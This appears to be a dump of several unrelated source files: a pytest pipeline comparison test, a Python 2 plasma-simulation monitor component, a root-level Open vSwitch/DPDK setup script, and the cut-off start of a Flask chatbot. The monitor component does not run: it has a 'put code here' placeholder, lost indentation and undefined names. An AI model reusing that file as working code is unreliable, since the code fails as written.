12,779 | 66a4fbbc8e5e24526c74aa2bcca8dbf18343801d | """Tests for the whole pipeline which is in test.
Focuses on verifying if all the file are created and similar to
what is expected.
Run this from project root directory:
$ python -m pytest
"""
import pytest
import subprocess
import shutil
import os
import filecmp
import textdistance
import numpy as np
@pytest.fixture(scope="session")
def run_pipeline():
    """Run the whole pipeline once per test session into tests/current_output."""
    out_dir = 'tests/current_output'
    shutil.rmtree(out_dir, ignore_errors=True)
    os.mkdir(out_dir)
    proc = subprocess.Popen("./tests/execute_whole_pipeline.sh", shell=True, stdout=subprocess.PIPE)
    proc.wait()
    return
def test_find_expected_files_preprocess(run_pipeline):
    """Preprocessing must leave the converted fast5 file in the output dir."""
    out_dir = "tests/current_output"
    for expected in ["output.fast5"]:
        assert os.path.exists(os.path.join(out_dir, expected))
def test_find_expected_files_calling(run_pipeline):
    """Calling must produce the fasta output and its B-ratio companion."""
    out_dir = "tests/current_output"
    for expected in ["output_file.fa", "output_file.fa_ratio_B"]:
        assert os.path.exists(os.path.join(out_dir, expected))
def compute_differences(f1_n, f2_n, numerical=False):
    """Diff two text files line by line.

    Returns:
        {'lines': <signed line-count delta>, 'n_line': <len of file 1>}
            when the files have different numbers of lines;
        {'letters': <total hamming distance>, 'n_line': ..., 'val': [...]}
            otherwise.  In numerical mode, non-header lines (not starting
            with '>') are parsed as whitespace-separated floats and 'val'
            collects |nanmean(line1) - nanmean(line2)| for each differing
            line, while header lines still add to the hamming total.
    """
    with open(f1_n, "r") as f1, open(f2_n, "r") as f2:
        lines_1 = f1.readlines()
        lines_2 = f2.readlines()
        # Different lengths: only the count difference is meaningful.
        if len(lines_1) != len(lines_2):
            return {"lines": len(lines_1) - len(lines_2), "n_line": len(lines_1)}
        d = 0
        val = []
        for l1, l2 in zip(lines_1, lines_2):
            if l1 != l2:
                if not numerical:
                    d += textdistance.hamming(l1, l2)
                else:
                    if l1.startswith(">"):
                        # Sequence headers are compared textually even in
                        # numerical mode.
                        d += textdistance.hamming(l1, l2)
                    else:
                        p1 = np.array(list(map(float, l1.strip().split())))
                        p2 = np.array(list(map(float, l2.strip().split())))
                        print(f"percent b string1 {np.nanmean(p1):.2f} percent b string 2 {np.nanmean(p2):.2f} , size {len(p1)}")
                        val.append(np.abs(np.nanmean(p1) - np.nanmean(p2)))
        return {"letters": d, "n_line": len(lines_1), "val": val}
def test_compare_file_calling(run_pipeline):
    """Compare the freshly produced calling outputs against the reference.

    Fails when line counts differ, when the textual hamming distance
    exceeds 100, or when the mean per-line numerical deviation exceeds
    10 percentage points.
    """
    out_dir = "tests/current_output"
    ref_dir = "tests/test_whole_pipeline_reference"
    for fname in ("output_file.fa", "output_file.fa_ratio_B"):
        f_ref = os.path.join(ref_dir, fname)
        f_new = os.path.join(out_dir, fname)
        is_numerical = "ratio" in f_ref
        delta = compute_differences(f_ref, f_new, numerical=is_numerical)
        if "lines" in delta.keys():
            print(f"{f_ref} and {f_new} have different number of lines")
            assert False
        elif delta["letters"] > 100:
            print(f"{f_ref} and {f_new} have same number of lines")
            print(f"But are two different, hamming distance is {delta['letters']}")
            assert False
        elif "val" in delta.keys() and np.mean(delta["val"]) > 0.10:
            print(f"{f_ref} and {f_new} have same number of lines")
            print(f"But are two different, mean val is {np.mean(delta['val'])}")
            assert False
if __name__ == "__main__":
    # Ad-hoc manual check of the numerical comparison on the ratio file.
    out_dir = "tests/current_output"
    ref_dir = "tests/test_whole_pipeline_reference"
    fname = "/output_file.fa_ratio_B"
    delta = compute_differences(out_dir + fname, ref_dir + fname, numerical=True)
    print(delta)
    print(np.mean(delta["val"]))
|
12,780 | 3f96b1c0f3edfbae56ffd040656eb54b8af6b28e | #! /usr/bin/env python
"""
gyro_monitor_comp.py 3-4-2015
This is a monitor component to track progress of a GRYO run within IPS. It is completely
separate from the IPS monitor_comp.py component in that it does not use Plasma State and
and it runs concurrently with the gk_gyro.py component.
This component is also different from IPS monitor component in that the monitor file cannont
be defined until after the first time step. This is because the init() of the gk_gyro.py
component does not produce output files. So we don't know some of the dimensions until
after the first time step, e.g. the number of columns in the out.gyro.error file. So this
init function just pushes out the portal RUNID and config file to the www directory. The
actually initialization of the monitor file happens in step() after the first time step.
This script exports 4 SWIM component functions:
init - defines the netcdf monitor file for monitor data then calls step to insert the
initial data (t = t0). Also saves some internal data needed to restart the
monitor component (monitorVars and ps_VarsList). These are are pickled to file
'monitor_restart'
restart - unpickles the internal monitor data previously saved in file 'monitor_restart'
and loads these global variables.
step - writes monitor data for current time step to the monitor netcdf file and saves it
finalize - sets the global netcdf attribute to tell ELViz to stop watching this
monitor file
change log:
"""
import sys
import os
import subprocess
import shutil
import pickle
from component import Component
# Import the necessary Numeric and netCDF modules
from netCDF4 import *
from numpy import *
# ------------------------------------------------------------------------------
#
# Global definitions
#
# ------------------------------------------------------------------------------
# --- Module-level state shared by the monitor component methods (Python 2) ---
# Verbose tracing switch for development.
debug = False
# True until step() has initialized the monitor file.
first_step = True
monitor_fileName = 'monitor_file.nc'
# List of requested variables to monitor (if dependencies are satisfied)
# The list just below is the default containing everything. In the component it can
# be overwritten with the configuration file data (some day maybe).
requestedVars = []
# List of variables to monitor (which dependencies are satisfied)
monitorVars = []
# List of grids needed to plot monitor variables
monitorGrids = []
# List of files in work directory containing variables to be monitored
filesList = ['out.gyro.t', 'out.gyro.error']
# List of non-grid dimensions needed for other variables - e.g. scalar lists
monitorDims = []
# Dictionary of Plasma State dependencies for each variable to be monitored:
monitorDefinition = {}
# Relative path to the concurrently running GYRO component's work directory.
gyro_work_path = os.path.join('../','gk_gyro_gk_gyro_2')
# check that gyro_work_path exists
if debug:
    monitorDefinition.update( { # testing
        'dummy':['S', 'arb', ['stuff']], 'q':['P', 'arb',['ns'],['rho'] ]
        } )
    # NOTE(review): monitor_comp_version is never defined in this file;
    # enabling debug raises NameError on the next two lines.
    print 'monitor_comp_version = ', monitor_comp_version
    print 'metaData = ',monitorDefinition['monitor_comp_metaData']
#----------------------------------------------------------------------------------------------
#
# Define some utility functions
#
#----------------------------------------------------------------------------------------------
#---------------------------------------------------------------------------------------
# Open an input file and return the lines
def get_lines(filename):
    """Return the list of lines of *filename*.

    Prints and re-raises (as a generic Exception) when the file cannot
    be opened.
    """
    try:
        file = open(filename, 'r')
    except Exception, e:
        message = 'get_lines: could not open file ' + filename
        print message, e
        raise Exception, message
    lines = file.readlines()
    file.close()
    return lines
class monitor(Component):
    def __init__(self, services, config):
        """Standard IPS component constructor; delegates to Component."""
        Component.__init__(self, services, config)
        print 'Created %s' % (self.__class__)
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
    def init(self, timeStamp=0):
        """Publish the run's HTML page and config file to the web (w3)
        directory and build the initial monitor netCDF file.

        NOTE(review): `cur_state_file` (used below) is never defined in
        this method or module -- as written, init() raises NameError when
        it reaches init_monitor_file. Presumably a plasma-state path was
        meant to be fetched from the framework; verify.
        """
        print 'gyro_monitor_comp.init() called'
        services = self.services
        workdir = services.get_working_dir()
        run_id = services.get_config_param('PORTAL_RUNID')
        monitor_file = 'monitor_file.nc'
        # print 'monitor file = ', monitor_file
        self.cdfFile = run_id+'_monitor_file.nc'
        services.log('w3 monitor file = ' + self.cdfFile)
        htmlFile = run_id +'.html'
        # Get input files
        try:
            work_dir_path = self.WORK_DIR_PATH
        except Exception, e:
            message = 'gyro_monitor_comp.init: failed to get WORK_DIR_PATH'
            print message, e
            services.error(message)
            raise Exception, message
        # Generate initial monitor file
        # NOTE(review): cur_state_file is undefined here (see docstring).
        retcode = self.init_monitor_file(cur_state_file, timeStamp)
        if (retcode != 0):
            services.log('Error executing INIT: init_monitor_file')
            return 1
        # copy monitor file to w3 directory
        try:
            shutil.copyfile(monitor_file,
                            os.path.join(self.W3_DIR, self.cdfFile))
        except IOError, (errno, strerror):
            print 'Error copying file %s to %s: %s' % \
                  (monitor_file, self.cdfFile, strerror)
        # NOTE(review): self.htmlText is not assigned anywhere in this
        # file -- presumably injected by the framework/config; verify.
        htmlText = self.htmlText.replace('@CDF_FILE@',
                                         os.path.join(self.W3_BASEURL, self.cdfFile))
        try:
            f = open(os.path.join(self.W3_DIR, htmlFile), 'w')
            f.write(htmlText)
            f.close()
        except IOError, (errno, strerror):
            print 'Error writing to file %s : %s' % \
                  (htmlFile, strerror)
            return
        monitorURL = os.path.join(self.W3_BASEURL , htmlFile)
        services.setMonitorURL(monitorURL)
        # Copy config file to w3 directory
        conf_file = services.get_config_param('SIMULATION_CONFIG_FILE')
        print 'conf_file = ', conf_file
        conf_file_name = os.path.split(conf_file)[1]
        new_file_name = run_id + '_' + conf_file_name
        new_full_path = os.path.join(self.W3_DIR, new_file_name)
        try:
            shutil.copyfile(conf_file, new_full_path)
        except IOError, (errno, strerror):
            print 'Error copying file %s to %s: %s' % \
                  (conf_file, new_full_path, strerror)
        return
# ------------------------------------------------------------------------------
#
# restart function
#
# Load the internal state needed to restart the monitor component. In particular
# monitorVars and ps_VarsList are unpickeld pickled from a file "monitor_restart".
#
# ------------------------------------------------------------------------------
    def restart(self, timeStamp):
        """
        Function restart loads the internal monitor state data needed for
        restart_MonitorComponent

        Re-stages the restart files, republishes the monitor file and HTML
        page to the w3 directory, then unpickles monitorVars/ps_VarsList/
        monitorDefinition from 'monitor_restart'.

        NOTE(review): init_monitor_file() pickles only monitorVars and
        monitorDefinition, so the 'ps_VarsList' lookup below would raise
        KeyError on data saved by this component -- confirm which side is
        out of date.
        """
        print 'monitor_comp.restart() called'
        services = self.services
        global monitorVars, ps_VarsList, monitorDefinition
        workdir = services.get_working_dir()
        run_id = services.get_config_param('PORTAL_RUNID')
        monitor_file = 'monitor_file.nc'
        # print 'monitor file = ', monitor_file
        self.cdfFile = run_id+'_monitor_file.nc'
        services.log('w3 monitor file = ' + self.cdfFile)
        htmlFile = run_id +'.html'
        # Get restart files listed in config file.
        try:
            restart_root = services.get_config_param('RESTART_ROOT')
            restart_time = services.get_config_param('RESTART_TIME')
            services.get_restart_files(restart_root, restart_time, self.RESTART_FILES)
        except Exception, e:
            print 'Error in call to get_restart_files()' , e
            raise
        # copy monitor file to w3 directory
        try:
            shutil.copyfile(monitor_file,
                            os.path.join(self.W3_DIR, self.cdfFile))
        except IOError, (errno, strerror):
            print 'Error copying file %s to %s: %s' % \
                  (monitor_file, self.cdfFile, strerror)
        htmlText = self.htmlText.replace('@CDF_FILE@',
                                         os.path.join(self.W3_BASEURL, self.cdfFile))
        try:
            f = open(os.path.join(self.W3_DIR, htmlFile), 'w')
            f.write(htmlText)
            f.close()
        except IOError, (errno, strerror):
            print 'Error writing to file %s : %s' % \
                  (htmlFile, strerror)
        monitorURL = os.path.join(self.W3_BASEURL , htmlFile)
        self.services.setMonitorURL(monitorURL)
        # Load monitorVars and ps_VarsList from pickle file "monitor_restart".
        # NOTE(review): the dict built on the next statement is immediately
        # overwritten by pickle.load below -- it is a dead store.
        pickleDict = {'monitorVars' : monitorVars, 'ps_VarsList': ps_VarsList,\
                      'monitorDefinition':monitorDefinition}
        # pickleDict = {'monitorVars' : monitorVars, 'ps_VarsList': ps_VarsList}
        pickFile = open('monitor_restart', 'r')
        pickleDict = pickle.load(pickFile)
        pickFile.close()
        monitorVars = pickleDict['monitorVars']
        ps_VarsList = pickleDict['ps_VarsList']
        monitorDefinition = pickleDict['monitorDefinition']
        print 'monitorDefinition = ', monitorDefinition
        print 'monitor restart finished'
        return 0
# ------------------------------------------------------------------------------
#
# step function
#
# Stages current input files (primarily plasma state). Updates the monitor_file.nc
# from current plasma state. And copies updated monitor file to w3 directory
#
# ------------------------------------------------------------------------------
def step(self, timeStamp):
print '\nmonitor_comp.step() called'
global first_step, monitor_fileName
services = self.services
if (self.services == None) :
print 'Error in monitor_comp: step() : no framework services'
return 1
# If this is the first call to step() initialize monitor file
if first_step == True:
# Check that gyro gyro has run long enough to produce output files, i.e.
# they exist. If not wait until they appear.
put code here
first_step == False
self.init_monitor_file(cur_state_file, timeStamp = 0)
monitor_file = monitor_fileName
# Call Load new data into monitor file
retcode = self.update_monitor_file(cur_state_file, timeStamp)
if (retcode != 0):
print 'Error executing command: update_monitor_file'
return 1
# "Archive" output files in history directory
services.stage_output_files(timeStamp, self.OUTPUT_FILES)
# copy montor file to w3 directory
try:
shutil.copyfile(monitor_file,
os.path.join(self.W3_DIR, self.cdfFile))
except IOError, (errno, strerror):
print 'Error copying file %s to %s: %s' % \
(monitor_file, self.W3_DIR, strerror)
return
# ------------------------------------------------------------------------------
#
# checkpoint function
#
# Saves restart files to restart directory. Should include: monitor_restart and
# monitor_file.nc
# ------------------------------------------------------------------------------
    def checkpoint(self, timestamp=0.0):
        """Save this component's restart files (monitor_restart and the
        monitor netCDF file) to the framework's restart directory."""
        print 'monitor.checkpoint() called'
        services = self.services
        services.save_restart_files(timestamp, self.RESTART_FILES)
# ------------------------------------------------------------------------------
#
# finalize function
#
# Calls monitor executable in "FINALIZE" mode which sets
# 'running' atribute to false so Elvis will stop watching the monitor file.
#
# ------------------------------------------------------------------------------
    def finalize(self, timestamp=0.0):
        """Finish the run.

        NOTE(review): the header comment says finalize should clear the
        'running' attribute so ELViz stops watching the monitor file, but
        this implementation is a no-op.
        """
        print 'monitor finalize finished'
        return 0
#----------------------------------------------------------------------------------------------
#
# init_monitor_file function
#
# Analyze the Plasma State dependencies of the variables requested to be monitored.
# Define the initial monitor netcdf file. Load the initial data into the monitor file
# By a call to the 'step' function. Also saves the internal state needed to restart
# the monitor component. In particular monitorVars and ps_VarsList are pickled to a
# file called monitor_restart.
#----------------------------------------------------------------------------------------------
    def init_monitor_file(self, cur_state_file, timeStamp = 0):
        """Function init_monitor_file generates the initial netcdf file for monitor data
        and saves the internal state needed to restart the monitor component

        NOTE(review): this method uses the bare name `services` without
        first binding `services = self.services`; as written it raises
        NameError at the first get_config_param call.
        """
        print ' '
        print 'gyro_monitor_component: init_monitor_file'
        # Get global configuration parameters
        # NOTE(review): RUN_ID, tokamak_id and shot_number all fetch the
        # config parameter 'SIM_NAME' -- looks like copy/paste; verify the
        # intended parameter names.
        try:
            Global_label = services.get_config_param('SIM_NAME')
        except Exception, e:
            message = 'gyro_monitor_comp init(): could not get config parameter SIM_NAME'
            print message, e
            raise Exception, message
        print 'Global_label = ', Global_label
        try:
            RUN_ID = services.get_config_param('SIM_NAME')
        except Exception, e:
            message = 'gyro_monitor_comp init(): could not get config parameter RUN_ID'
            print message, e
            raise Exception, message
        print 'RUN_ID = ', RUN_ID
        try:
            tokamak_id = services.get_config_param('SIM_NAME')
        except Exception, e:
            message = 'gyro_monitor_comp init(): could not get config parameter tokamak_id'
            print message, e
            raise Exception, message
        print 'tokamak_id = ', tokamak_id
        try:
            shot_number = services.get_config_param('SIM_NAME')
        except Exception, e:
            message = 'gyro_monitor_comp init(): could not get config parameter shot_number'
            print message, e
            raise Exception, message
        print 'shot_number = ', shot_number
        # Get monitor variables
        # Get data from out.gyro.error
        # NOTE(review): 'getlines' is undefined -- the module helper is
        # named get_lines.
        input_lines = getlines(os.path.join(gyro_work_path, 'out.gyro.error'))
        # Find out how many species are included i.e. number of columns in file
        n_species = len(input_lines[0].split())
        # Register one scalar ('S') monitor variable per species column.
        for i in range(n_species):
            var_name = 'species_' + str(i+1)
            monitorVars.append(var_name)
            monitorDefinition.update( {var_name: ['S', ' ', [] ]})
        #
        ## Define monitor file
        #
        # Open the monitor file for output
        monitor_file = Dataset(monitor_fileName, 'w', format = 'NETCDF3_CLASSIC')
        # make global netcdf attribute of monitor component version number
        # NOTE(review): monitor_comp_version is never defined in this file.
        setattr(monitor_file, 'monitor_comp_version', monitor_comp_version)
        # make global netcdf attribute for Global_label
        setattr(monitor_file, 'Global_label', Global_label)
        # make global netcdf attribute for RunID
        # NOTE(review): the local variable is RUN_ID; 'RunID' is undefined.
        setattr(monitor_file, 'RunID', RunID)
        # make global netcdf attribute for tokamak_id
        setattr(monitor_file, 'tokamak_id', tokamak_id)
        # make global netcdf attribute for shot_number
        setattr(monitor_file, 'shot_number', shot_number)
        # Create unlimited time dimension and define time variable
        monitor_file.createDimension('timeDim', None)
        time = monitor_file.createVariable('time', float, ('timeDim',))
        setattr(time, 'units', '-')
        # Create grid dimensions and variables and load up grids
        # use this to keep track of mon_grid name, grid_dim_name and grid_dim_value
        # NOTE(review): monitorGrids is empty in this file, so grid_map
        # stays empty; the 'P'/'2D' branches below would KeyError on it.
        grid_map = {}
        for grid in monitorGrids:
            pass
        # Create monitor variables in netCDF4
        for var in monitorVars:
            if debug:
                print 'creating variable ', var
            # Generate the dimension tuple
            dims = ('timeDim',)
            varKind = monitorDefinition[var][0]
            if varKind == 'S':
                mon_obj = monitor_file.createVariable(var, float, dims)
            elif varKind == 'P':
                varGridsList = monitorDefinition[var][3]
                # add in dimension names for plotting grids
                for grid in varGridsList:
                    dims = dims + grid_map[grid][1]
                mon_obj = monitor_file.createVariable(var, float, dims )
            elif varKind == 'SL':
                varDimList = monitorDefinition[var][3]
                # add in dimension names
                for dim_name in varDimList:
                    dims = dims + (dim_name,)
                mon_obj = monitor_file.createVariable(var, float, dims )
            elif varKind == '2D': # See note at top about the order of dims in definition
                varGridsList = monitorDefinition[var][3]
                for grid in varGridsList: # add in dimension names for plotting grids
                    dims = dims + grid_map[grid][1]
                if debug:
                    print var, ' dimensions = ', dims
                mon_obj = monitor_file.createVariable(var, float, dims )
            varUnits = monitorDefinition[var][1]
            #Generate units atribute for var
            setattr(mon_obj, 'units', varUnits)
        # Finished defining monitor file. Close it.
        monitor_file.close()
        # insert intitial data
        self.step(timeStamp)
        print 'monitor file initialization finished'
        # Save monitorVars and ps_VarsList and monitorDefinition, are pickled to file "monitor_restart".
        # NOTE(review): ps_VarsList is NOT actually in the dict below,
        # although restart() expects it in the unpickled data.
        pickleDict = {'monitorVars' : monitorVars, 'monitorDefinition': monitorDefinition}
        pickFile = open('monitor_restart', 'w')
        pickle.dump(pickleDict, pickFile)
        pickFile.close()
        return 0
#----------------------------------------------------------------------------------------------
#
# update_monitor_file function
#
# Opens current plasma state file and monitor netcdf file. Pulls the needed variables out of
# the plasma state file. Computes the monitor variables from plasma state data (in functinon
# calculate_MonitorVariable). And loads the data into the monitor netcdf variables.
#
#----------------------------------------------------------------------------------------------
    def update_monitor_file(self, cur_state_file, timeStamp = 0):
        """Append the monitor variables for one time step.

        Opens the plasma state file read-only and the monitor netCDF file
        read/write, computes each monitored quantity with
        calculate_MonitorVariable, and writes it at the next index of the
        unlimited time dimension.

        NOTE(review): ps_VarsList is only bound by restart(); on a fresh
        run it is undefined at module scope, so this would raise NameError.
        """
        print ' '
        print 'monitor_component: update_monitor_file'
        #Open Plasma State file
        plasma_state = Dataset(cur_state_file, 'r', format = 'NETCDF3_CLASSIC')
        # Get all Plasma State variable objects for dependencies
        ps_variables = {}
        for var in ps_VarsList:
            ps_variables[var] = plasma_state.variables[var]
        if debug:
            print ' '
            print 'ps_variables.keys() = ', ps_variables.keys()
        # Open the monitor file for output
        monitor_file = Dataset(monitor_fileName, 'r+', format = 'NETCDF3_CLASSIC')
        if debug:
            all_mon_Dims = monitor_file.dimensions
            all_mon_VarNames = monitor_file.variables.keys()
            print ' '
            print 'all_mon_Dims = ', all_mon_Dims
            print ' '
            print 'all_mon_VarNames = ', all_mon_VarNames
        # Get time variable object
        time = monitor_file.variables['time']
        n_step =time.shape[0] # Time step number (initially 0)
        print 'time step number = ', n_step
        time[n_step] = float(timeStamp)
        # Insert data into monitor variables
        for var in monitorVars:
            # Get the netcdf variable object for this variable
            var_obj = monitor_file.variables[var]
            # Get Plasma State variables for this monitor variable's dependencies
            varDepsDict ={}
            varDepsList = monitorDefinition[var][2]
            for dep in varDepsList:
                varDepsDict[dep] = ps_variables[dep]
            if debug:
                print ' '
                print 'var =', var
                print 'varDepsDict.keys = ', varDepsDict.keys()
                print 'varDepsDict = ', varDepsDict
            # calculate the monitor variable
            value = self.calculate_MonitorVariable(var, varDepsDict)
            # Load the data into monitor variables
            varKind = monitorDefinition[var][0]
            if varKind == 'S':
                var_obj[n_step] = value
            if varKind == 'P':
                var_obj[n_step,:] = value
            if varKind == 'SL':
                var_obj[n_step,:] = value
            if varKind == '2D':
                var_obj[n_step,:] = value
        # Finished writing to monitor file. Close it.
        monitor_file.close()
        # Close plasma_state
        plasma_state.close()
        print 'update_monitor_file finished'
        return 0
#----------------------------------------------------------------------------------------------
#
# calculate_MonitorVariable function
#
# For given montor variable it calculates the variable value from the netcdf variable objects
# in the varDepsDict dictionary on which the monitor variable depends.
#
#----------------------------------------------------------------------------------------------
    def calculate_MonitorVariable(self, var, varDepsDict):
        """Compute the value of monitor variable *var* from the netCDF
        dependency objects in *varDepsDict*.

        NOTE(review): this is an unfinished stub -- `value` is never
        assigned, so the method raises NameError when called.
        """
        if debug:
            print 'calculate_MonitorVariable, var = ', var
            for dep_name in varDepsDict.keys():
                print dep_name, '= ', varDepsDict[dep_name][:]
                print dep_name, ' shape = ', varDepsDict[dep_name].shape
        if debug:
            print ' '
            print var, ' = ', value
        return value
|
12,781 | e0b4d765d7fadb20466a6a17c2e5ce56cd6146d3 | #!/bin/python3
import os
import argparse
import sys
import subprocess
#mail: zhaojunchao@loongson.cn
# --- Global configuration, derived paths and CLI definition ------------------
arg_f = False;
hugepagenum = "";
db_socket = "db.sock";
# When True, bridges/ports are created with DPDK (netdev) datapaths.
en_dpdk=True;
# Layout of the OVS installation tree, relative to the current directory.
dir_bin = "./bin/";
dir_sbin = "./sbin/";
dir_work = os.getcwd() + "/";
dir_etc = "./etc/openvswitch/"
dir_var_run = "./var/run/openvswitch/"
dir_var_log = "./var/log/openvswitch/"
dir_share = "./share/openvswitch/"
# DPDK build environment; required when en_dpdk is True.
ret_sdk = os.getenv('RTE_SDK')
ret_target = os.getenv('RTE_TARGET');
# Command-line options.
parse = argparse.ArgumentParser();
parse.add_argument('-pages',default="128", type=str);
parse.add_argument('-addbr',type=str);
parse.add_argument('-dpdk', default="yes", type=str);
parse.add_argument('-addport',type=str, nargs=3);
print("work dir:" + dir_work);
def print_error(pstr):
    """Print *pstr* to stdout highlighted in red."""
    message = "\033[27;31;31m\t{}\033[0m".format(pstr)
    print(message)
def init_hugepage(num):
    """Reserve *num* hugepages via /proc and mount hugetlbfs.

    Exits the process with -1 if the kernel does not accept the count.
    Requires root privileges.
    """
    os.system("echo {} > /proc/sys/vm/nr_hugepages".format(num));
    # Read back the count to verify the kernel accepted the request.
    ps = subprocess.run(["cat", "/proc/sys/vm/nr_hugepages"], stdout=subprocess.PIPE);
    if(num in str(ps.stdout)):
        print("set hugepage_nr {} success".format(num));
    else:
        print_error("set hugepage_nr error! nr is {}".format(str(ps.stdout)));
        exit(-1);
    #TODO: for x86
    # NOTE(review): the 32 MB page size below is platform-specific
    # (LoongArch); x86 uses different hugepage sizes.
    os.system("mount -t hugetlbfs -o pagesize=32768k none /dev/hugepages")
def init_kmod():
    """Load the kernel modules OVS needs (uio + igb_uio for DPDK, plus
    openvswitch) and verify them via lsmod; exits with -1 on failure."""
    global en_dpdk
    # DPDK mode needs the DPDK build tree to locate igb_uio.ko.
    if(en_dpdk and (ret_sdk is None)):
        print_error("please set RET_SDK and RTE_RARGET");
        exit(-1);
    os.system("modprobe uio");
    os.system("modprobe openvswitch");
    if(en_dpdk):
        os.system("insmod " + ret_sdk + "/" + ret_target + "/kmod/igb_uio.ko");
    # Confirm the modules actually loaded.
    ps = subprocess.run(["lsmod"], stdout=subprocess.PIPE);
    if (en_dpdk == False):
        print("no dpdk");
    elif ("igb_uio" in str(ps.stdout)):
        print("igb_uio mod ok");
    else:
        print_error("ismod igb_uio error");
        exit(-1);
    if("openvswitch" in str(ps.stdout)):
        print("OVS mod ok");
    else:
        print("ismod OVS error");
        exit(-1);
def init_env():
    """Validate the environment and create the runtime directories OVS expects.

    Exits when DPDK is enabled but RTE_SDK is unset, or when the script is not
    being run from an OVS install tree (./bin/ovs-vsctl missing).
    """
    global en_dpdk
    if en_dpdk and (ret_sdk is None):
        print("please set RET_SDK and RTE_RARGET")
        exit(-1)
    if not os.path.isfile("./bin/ovs-vsctl"):
        print_error("not in OVS install dir")
        exit(-1)
    # The original triplicated this check/mkdir block per directory; fold it
    # into one loop and use os.makedirs instead of shelling out to `mkdir -p`.
    for directory in (dir_etc, dir_var_run, dir_var_log):
        if not os.path.isdir(directory):
            print("creat " + directory)
            os.makedirs(directory, exist_ok=True)
def add_br(name):
    """Create userspace bridge *name* (netdev datapath) and show the result."""
    create_cmd = dir_bin + "ovs-vsctl add-br {} -- set bridge {} datapath_type=netdev".format(name, name)
    os.system(create_cmd)
    os.system(dir_bin + "ovs-vsctl show")
def add_port(br, name, idx):
    """Attach port *name* to bridge *br*; as a vhost-user client port when DPDK is on.

    *idx* selects the vhost-user socket path (/usr/local/var/run/sock<idx>).
    """
    if not en_dpdk:
        os.system(dir_bin + "ovs-vsctl add-port {} {}".format(br, name))
    else:
        os.system(dir_bin + "ovs-vsctl add-port {} {} -- set Interface {} type=dpdkvhostuserclient options:vhost-server-path=/usr/local/var/run/sock{} mtu_request=1500".format(br, name, name, idx))
    os.system(dir_bin + "ovs-vsctl show")
def clr_env():
    """Kill any running OVS daemons and wipe their database and vhost sockets."""
    for command in ("killall ovsdb-server ovs-vswitchd",
                    "rm ./etc/openvswitch/conf.db",
                    "rm -f ./var/run/openvswitch/vhost-user*"):
        os.system(command)
def show_info():
    """Dump a status report: hugepages, loaded modules, and OVS daemon state."""
    print("#hugepagenum : ------------------------------");
    os.system("cat /proc/sys/vm/nr_hugepages");
    print("# mod ---------------------------------------");
    os.system("lsmod | grep uio");
    os.system("lsmod | grep openvswitch");
    print("# ovs ---------------------------------------");
    # Detect a running ovs-vswitchd by scanning the process list.
    ps = subprocess.run(["ps", "-ef"], stdout=subprocess.PIPE);
    if("ovs-vswitchd" in str(ps.stdout)):
        print("ovs-vswitchd is running!");
        # Ask the daemon itself whether DPDK finished initializing.
        ps1 = subprocess.run([dir_bin + "ovs-vsctl", "get", "Open_vSwitch", ".", "dpdk_initialized"], stdout=subprocess.PIPE);
        if("true" in str(ps1.stdout)):
            print("Open_vSwitch . dpdk_initialized");
        else:
            print_error("Open_vSwitch . dpdk_initialize ERROR!");
    else:
        print_error("ovs-vswitchd is not running!");
    os.system(dir_bin + "ovs-vsctl show");
def cook_arg():
    """Parse CLI arguments and dispatch one-shot subcommands.

    Mutates module globals (hugepagenum, en_dpdk, arg_f). Handles -addbr and
    -addport immediately and exits; positional keywords page/mod/log/clr/show
    run their action and exit. Returns only when the full setup sequence below
    this function should continue.
    """
    global hugepagenum
    global en_dpdk
    # BUG FIX: arg_f was assigned below without a `global` declaration, which
    # made it a function-local read uninitialized at the final `if arg_f:` —
    # every plain invocation crashed with UnboundLocalError.
    global arg_f
    args = parse.parse_args()
    print(args)
    hugepagenum = args.pages
    if args.dpdk is not None:
        print(args.dpdk)
        if args.dpdk == "no":
            en_dpdk = False
    if args.addbr is not None:
        print(args.addbr)
        add_br(args.addbr)
        exit(0)
    if args.addport is not None:
        # argparse nargs=3 already guarantees exactly three values; the check
        # is kept as a defensive safety net.
        if len(args.addport) != 3:
            print("arg error!")
            print("br_name port_name port_id")
            exit(-1)
        add_port(args.addport[0], args.addport[1], args.addport[2])
        exit(0)
    if "page" in sys.argv:
        init_hugepage(sys.argv[sys.argv.index("page") + 1])
        arg_f = True
    if "mod" in sys.argv:
        init_kmod()
        arg_f = True
    if "log" in sys.argv:
        os.system("cat var/log/openvswitch/ovs-vswitchd.log")
        arg_f = True
    if "clr" in sys.argv:
        clr_env()
        arg_f = True
    if "show" in sys.argv:
        show_info()
        arg_f = True
    if arg_f:
        exit(0)
# --- main setup sequence: build a fresh OVS(+DPDK) instance from scratch ---
cook_arg();
init_env();
init_hugepage(hugepagenum);
init_kmod();
# Start from a clean slate: kill daemons, remove old db and sockets.
clr_env();
print("creat conf.db");
os.system(dir_bin + "ovsdb-tool create " + dir_etc + "conf.db " + dir_share + "vswitch.ovsschema");
print("start db server");
os.system(dir_sbin + "ovsdb-server --remote=punix:" + db_socket + " --remote=db:Open_vSwitch,Open_vSwitch,manager_options --pidfile --detach");
print("set per port mem");
os.system(dir_bin + "ovs-vsctl --no-wait set Open_vSwitch . other_config:per-port-memory=true");
print("init");
os.system(dir_bin + "ovs-vsctl --no-wait init");
print("set port mask");
if(en_dpdk):
    # DPDK knobs: pin the lcore mask, reserve socket memory, then let
    # ovs-vswitchd initialize the DPDK datapath on startup.
    os.system(dir_bin + "ovs-vsctl --no-wait set Open_vSwitch . other_config:dpdk-lcore-mask=0x2");
    print("set socket mem");
    os.system(dir_bin + "ovs-vsctl --no-wait set Open_vSwitch . other_config:dpdk-socket-mem=2048");
    print("init dpdk");
    os.system(dir_bin + "ovs-vsctl --no-wait set Open_vSwitch . other_config:dpdk-init=true");
print("set log");
os.system(dir_sbin + "ovs-vswitchd unix:"+ dir_work +"var/run/openvswitch/db.sock --pidfile --detach --log-file=" + dir_var_log +"ovs-vswitchd.log");
# Confirm DPDK came up inside the daemon.
ps = subprocess.run([dir_bin + "ovs-vsctl", "get", "Open_vSwitch", ".", "dpdk_initialized"], stdout=subprocess.PIPE);
if("true" in str(ps.stdout)):
    print("ovs-vswitchd dpdk start!");
else :
    print_error("ovs-vswitchd dpdk start ERROR!");
|
12,782 | 405b953fb91aefb6d66ac1b571640ea3481f7e1d | # -*- coding: utf-8 -*-
from flask import Flask
from flask import request
from flask import jsonify
from flask import json
app = Flask(__name__)
@app.route("/keyboard")
def keyboard():
    """Kakao bot handshake endpoint: declare a free-text ('text') keyboard."""
    return jsonify(type='text')
@app.route('/message', methods=['POST'])
def message():
    """Kakao bot message endpoint.

